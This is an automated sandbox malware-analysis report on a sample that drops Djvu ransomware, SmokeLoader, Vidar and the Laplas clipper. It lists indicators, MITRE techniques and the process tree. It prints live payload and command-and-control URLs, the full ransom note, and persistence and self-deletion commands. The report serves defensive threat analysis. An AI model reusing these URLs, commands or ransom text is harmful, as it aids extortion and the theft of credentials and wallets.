djvu | 2fa5adb1940605fdf9a3b39af904fe7cc2dba8d70039e1f96829a510242d71e2

max time kernel
120s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
10-02-2023 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Size

298KB
MD5

11511ba5fd4de1fc5051d0bcefb388ae
SHA1

5e9476f39df92e01d0952e703869e71f85d470cd
SHA256

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a
SHA512

904f0e3a252cd0ef8108492de955ac520008b10b66da736cc4bbdc6a8c3736440a9a11edb73707ba415d7f3f4c2c590dfa983aca01864b9d66a6c3559ed744e9
SSDEEP

3072:0pb2LIT54Ga9Qzgp4gaCJrSjgBoMZmYKxQCBnIyCSyxzID1C7hZW0KIsiuNZ:xLIKGa96dfkBoMsDlqSwzIDM/KPP

Score

10^/10

djvu laplas smokeloader vidar 19 backdoor clipper discovery evasion persistence ransomware spyware stealer trojan vmprotect

Malware Config

Extracted

Family

djvu

http://bihsy.com/lancer/get.php

Attributes

extension
.vvoo
offline_id
9c20OtJsXdFeF07b1IeFK5ERGv1zIb659YG380t1
payload_url
http://uaery.top/dl/build2.exe
http://bihsy.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-IiDRZpWuwI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0645JOsie

rsa_pubkey.plain

Extracted

Family

vidar

Version

2.4

Botnet

Attributes

profile_id
19

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2164-166-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2164-168-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4524-170-0x00000000023E0000-0x00000000024FB000-memory.dmp	family_djvu
behavioral2/memory/2164-171-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2164-175-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2164-221-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2212-236-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2212-238-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2212-240-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2212-256-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4072-133-0x0000000000700000-0x0000000000709000-memory.dmp	family_smokeloader
behavioral2/memory/3188-173-0x0000000000500000-0x0000000000509000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	4304	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	4304	rundll32.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

Processes:

XandETC.exeXandETC.exe

description	pid	process	target process
PID 4712 created 2684	4712	XandETC.exe	Explorer.EXE
PID 5100 created 2684	5100	XandETC.exe	Explorer.EXE
PID 4712 created 2684	4712	XandETC.exe	Explorer.EXE
PID 5100 created 2684	5100	XandETC.exe	Explorer.EXE
PID 4712 created 2684	4712	XandETC.exe	Explorer.EXE
PID 4712 created 2684	4712	XandETC.exe	Explorer.EXE
PID 5100 created 2684	5100	XandETC.exe	Explorer.EXE
PID 5100 created 2684	5100	XandETC.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

115 4272 rundll32.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
115	4272	rundll32.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

416E.exe6F0C.exe45C5.exeliuj.exeliuj.exe45C5.exebuild2.exe5B92.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	416E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	6F0C.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	45C5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	liuj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	liuj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	45C5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	5B92.exe

Executes dropped EXE 23 IoCs

Processes:

416E.exe43FF.exe45C5.exe4C7D.exe4E53.exe5B92.exe6F0C.exe7304.exe45C5.exellpb1133.exellpb1133.exeliuj.exeliuj.exeXandETC.exeXandETC.exeliuj.exeliuj.exe45C5.exe45C5.exebuild2.exe12D0.exebuild3.exebuild2.exe

pid	process
4788	416E.exe
2324	43FF.exe
4524	45C5.exe
3188	4C7D.exe
4184	4E53.exe
4864	5B92.exe
1340	6F0C.exe
1424	7304.exe
2164	45C5.exe
2232	llpb1133.exe
1112	llpb1133.exe
1768	liuj.exe
1640	liuj.exe
4712	XandETC.exe
5100	XandETC.exe
868	liuj.exe
4072	liuj.exe
912	45C5.exe
2212	45C5.exe
5056	build2.exe
3432	12D0.exe
3184	build3.exe
2752	build2.exe

Loads dropped DLL 6 IoCs

Processes:

rundll32.exerundll32.exebuild2.exerundll32.exe

pid process

2416 rundll32.exe
3168 rundll32.exe
2752 build2.exe
2752 build2.exe
4272 rundll32.exe
4272 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4784 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2416	rundll32.exe
3168	rundll32.exe
2752	build2.exe
2752	build2.exe
4272	rundll32.exe
4272	rundll32.exe

pid	process
4784	icacls.exe

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
behavioral2/memory/2232-197-0x0000000140000000-0x0000000140620000-memory.dmp	vmprotect
behavioral2/memory/1112-199-0x0000000140000000-0x0000000140620000-memory.dmp	vmprotect

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

45C5.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7ddf794f-4728-451c-8d9b-c75d727c8a8e\\45C5.exe\" --AutoStart"	45C5.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

48 api.2ip.ua
70 api.2ip.ua
47 api.2ip.ua

flow	ioc
48	api.2ip.ua
70	api.2ip.ua
47	api.2ip.ua

Suspicious use of SetThreadContext 3 IoCs

Processes:

45C5.exe45C5.exebuild2.exe

description	pid	process	target process
PID 4524 set thread context of 2164	4524	45C5.exe	45C5.exe
PID 912 set thread context of 2212	912	45C5.exe	45C5.exe
PID 5056 set thread context of 2752	5056	build2.exe	build2.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2340 sc.exe
5044 sc.exe
4528 sc.exe
3888 sc.exe
2920 sc.exe
3388 sc.exe
1120 sc.exe
556 sc.exe
4892 sc.exe
4928 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2340	sc.exe
5044	sc.exe
4528	sc.exe
3888	sc.exe
2920	sc.exe
3388	sc.exe
1120	sc.exe
556	sc.exe
4892	sc.exe
4928	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3360	4184	WerFault.exe	4E53.exe
2436	4788	WerFault.exe	416E.exe
4424	2416	WerFault.exe	rundll32.exe
2744	3168	WerFault.exe	rundll32.exe
5044	1424	WerFault.exe	7304.exe
3112	3432	WerFault.exe	12D0.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe4C7D.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4C7D.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4C7D.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4C7D.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2292 schtasks.exe
4904 schtasks.exe
1356 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3564 timeout.exe

pid	process
2292	schtasks.exe
4904	schtasks.exe
1356	schtasks.exe

pid	process
3564	timeout.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	60	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exeExplorer.EXE

pid	process
4072	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
4072	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE
2684	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2684 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe4C7D.exe

pid process

4072 79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
3188 4C7D.exe

pid	process
2684	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEpowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeShutdownPrivilege	2684	Explorer.EXE
Token: SeCreatePagefilePrivilege	2684	Explorer.EXE
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE45C5.exe45C5.exe6F0C.exe416E.exe5B92.exeliuj.exeliuj.exerundll32.exe

description	pid	process	target process
PID 2684 wrote to memory of 4788	2684	Explorer.EXE	416E.exe
PID 2684 wrote to memory of 4788	2684	Explorer.EXE	416E.exe
PID 2684 wrote to memory of 4788	2684	Explorer.EXE	416E.exe
PID 2684 wrote to memory of 2324	2684	Explorer.EXE	43FF.exe
PID 2684 wrote to memory of 2324	2684	Explorer.EXE	43FF.exe
PID 2684 wrote to memory of 2324	2684	Explorer.EXE	43FF.exe
PID 2684 wrote to memory of 4524	2684	Explorer.EXE	45C5.exe
PID 2684 wrote to memory of 4524	2684	Explorer.EXE	45C5.exe
PID 2684 wrote to memory of 4524	2684	Explorer.EXE	45C5.exe
PID 2684 wrote to memory of 3188	2684	Explorer.EXE	4C7D.exe
PID 2684 wrote to memory of 3188	2684	Explorer.EXE	4C7D.exe
PID 2684 wrote to memory of 3188	2684	Explorer.EXE	4C7D.exe
PID 2684 wrote to memory of 4184	2684	Explorer.EXE	4E53.exe
PID 2684 wrote to memory of 4184	2684	Explorer.EXE	4E53.exe
PID 2684 wrote to memory of 4184	2684	Explorer.EXE	4E53.exe
PID 2684 wrote to memory of 4864	2684	Explorer.EXE	5B92.exe
PID 2684 wrote to memory of 4864	2684	Explorer.EXE	5B92.exe
PID 2684 wrote to memory of 4864	2684	Explorer.EXE	5B92.exe
PID 2684 wrote to memory of 1340	2684	Explorer.EXE	6F0C.exe
PID 2684 wrote to memory of 1340	2684	Explorer.EXE	6F0C.exe
PID 2684 wrote to memory of 1340	2684	Explorer.EXE	6F0C.exe
PID 2684 wrote to memory of 1424	2684	Explorer.EXE	7304.exe
PID 2684 wrote to memory of 1424	2684	Explorer.EXE	7304.exe
PID 2684 wrote to memory of 1424	2684	Explorer.EXE	7304.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 4524 wrote to memory of 2164	4524	45C5.exe	45C5.exe
PID 2164 wrote to memory of 4784	2164	45C5.exe	icacls.exe
PID 2164 wrote to memory of 4784	2164	45C5.exe	icacls.exe
PID 2164 wrote to memory of 4784	2164	45C5.exe	icacls.exe
PID 1340 wrote to memory of 1112	1340	6F0C.exe	llpb1133.exe
PID 1340 wrote to memory of 1112	1340	6F0C.exe	llpb1133.exe
PID 4788 wrote to memory of 1356	4788	416E.exe	schtasks.exe
PID 4788 wrote to memory of 1356	4788	416E.exe	schtasks.exe
PID 4788 wrote to memory of 1356	4788	416E.exe	schtasks.exe
PID 4864 wrote to memory of 2232	4864	5B92.exe	llpb1133.exe
PID 4864 wrote to memory of 2232	4864	5B92.exe	llpb1133.exe
PID 4864 wrote to memory of 1768	4864	5B92.exe	liuj.exe
PID 4864 wrote to memory of 1768	4864	5B92.exe	liuj.exe
PID 4864 wrote to memory of 1768	4864	5B92.exe	liuj.exe
PID 1340 wrote to memory of 1640	1340	6F0C.exe	liuj.exe
PID 1340 wrote to memory of 1640	1340	6F0C.exe	liuj.exe
PID 1340 wrote to memory of 1640	1340	6F0C.exe	liuj.exe
PID 2164 wrote to memory of 912	2164	45C5.exe	45C5.exe
PID 2164 wrote to memory of 912	2164	45C5.exe	45C5.exe
PID 2164 wrote to memory of 912	2164	45C5.exe	45C5.exe
PID 1340 wrote to memory of 4712	1340	6F0C.exe	XandETC.exe
PID 1340 wrote to memory of 4712	1340	6F0C.exe	XandETC.exe
PID 4864 wrote to memory of 5100	4864	5B92.exe	XandETC.exe
PID 4864 wrote to memory of 5100	4864	5B92.exe	XandETC.exe
PID 1768 wrote to memory of 868	1768	liuj.exe	liuj.exe
PID 1768 wrote to memory of 868	1768	liuj.exe	liuj.exe
PID 1768 wrote to memory of 868	1768	liuj.exe	liuj.exe
PID 1640 wrote to memory of 4072	1640	liuj.exe	liuj.exe
PID 1640 wrote to memory of 4072	1640	liuj.exe	liuj.exe
PID 1640 wrote to memory of 4072	1640	liuj.exe	liuj.exe
PID 4492 wrote to memory of 2416	4492	rundll32.exe	rundll32.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684

C:\Users\Admin\AppData\Local\Temp\79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
"C:\Users\Admin\AppData\Local\Temp\79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4072

C:\Users\Admin\AppData\Local\Temp\416E.exe
C:\Users\Admin\AppData\Local\Temp\416E.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4788

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 1028
3⤵
- Program crash
PID:2436

C:\Users\Admin\AppData\Local\Temp\43FF.exe
C:\Users\Admin\AppData\Local\Temp\43FF.exe
2⤵
- Executes dropped EXE
PID:2324

C:\Users\Admin\AppData\Local\Temp\45C5.exe
C:\Users\Admin\AppData\Local\Temp\45C5.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4524

C:\Users\Admin\AppData\Local\Temp\45C5.exe
C:\Users\Admin\AppData\Local\Temp\45C5.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\7ddf794f-4728-451c-8d9b-c75d727c8a8e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:4784

C:\Users\Admin\AppData\Local\Temp\45C5.exe
"C:\Users\Admin\AppData\Local\Temp\45C5.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:912

C:\Users\Admin\AppData\Local\Temp\45C5.exe
"C:\Users\Admin\AppData\Local\Temp\45C5.exe" --Admin IsNotAutoStart IsNotTask
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:2212

C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe
"C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5056

C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe
"C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe" & exit
8⤵
PID:3748

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:3564

C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build3.exe
"C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build3.exe"
6⤵
- Executes dropped EXE
PID:3184

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:2292

C:\Users\Admin\AppData\Local\Temp\4C7D.exe
C:\Users\Admin\AppData\Local\Temp\4C7D.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3188

C:\Users\Admin\AppData\Local\Temp\4E53.exe
C:\Users\Admin\AppData\Local\Temp\4E53.exe
2⤵
- Executes dropped EXE
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 344
3⤵
- Program crash
PID:3360

C:\Users\Admin\AppData\Local\Temp\5B92.exe
C:\Users\Admin\AppData\Local\Temp\5B92.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4864

C:\Users\Admin\AppData\Local\Temp\llpb1133.exe
"C:\Users\Admin\AppData\Local\Temp\llpb1133.exe"
3⤵
- Executes dropped EXE
PID:2232

C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe" -h
4⤵
- Executes dropped EXE
PID:868

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:5100

C:\Users\Admin\AppData\Local\Temp\6F0C.exe
C:\Users\Admin\AppData\Local\Temp\6F0C.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1340

C:\Users\Admin\AppData\Local\Temp\llpb1133.exe
"C:\Users\Admin\AppData\Local\Temp\llpb1133.exe"
3⤵
- Executes dropped EXE
PID:1112

